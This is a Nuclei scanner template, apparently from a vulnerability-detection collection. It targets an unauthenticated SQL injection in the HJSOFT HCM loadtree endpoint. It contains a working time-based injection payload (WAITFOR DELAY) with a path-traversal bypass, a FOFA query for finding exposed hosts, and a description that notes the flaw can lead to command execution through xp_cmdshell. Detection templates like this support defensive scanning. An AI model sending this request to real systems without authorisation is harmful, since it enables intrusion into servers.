id: hjsoft-loadtree-sqli

info:
  name: 宏景 HCM 系统 loadtree - sqli
  author: leadlife
  severity: high
  description: 宏景 HCM 系统 /common/org/loadtree 接口存在SQL注入漏洞，未经身份验证的远程攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令，从而控制服务器。经过分析与研判，该漏洞利用难度低，建议尽快修复。
  metadata:
    verified: true
    fofa-query: app="HJSOFT-HCM"
  tags: sqli, hjsoft, time

http:
  - raw:
      - |
        @timeout: 15s
        GET /w_selfservice/oauthservlet/%2e./.%2e/common/org/loadtree?params=child&treetype=1&parentid=1%27%3BWAITFOR+DELAY+%270%3A0%3A6%27--&kind=2&issuperuser=1&manageprive=1&action=1&target=1&backdate=1&jump=1 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - duration >= 5 && duration < 9
        condition: and
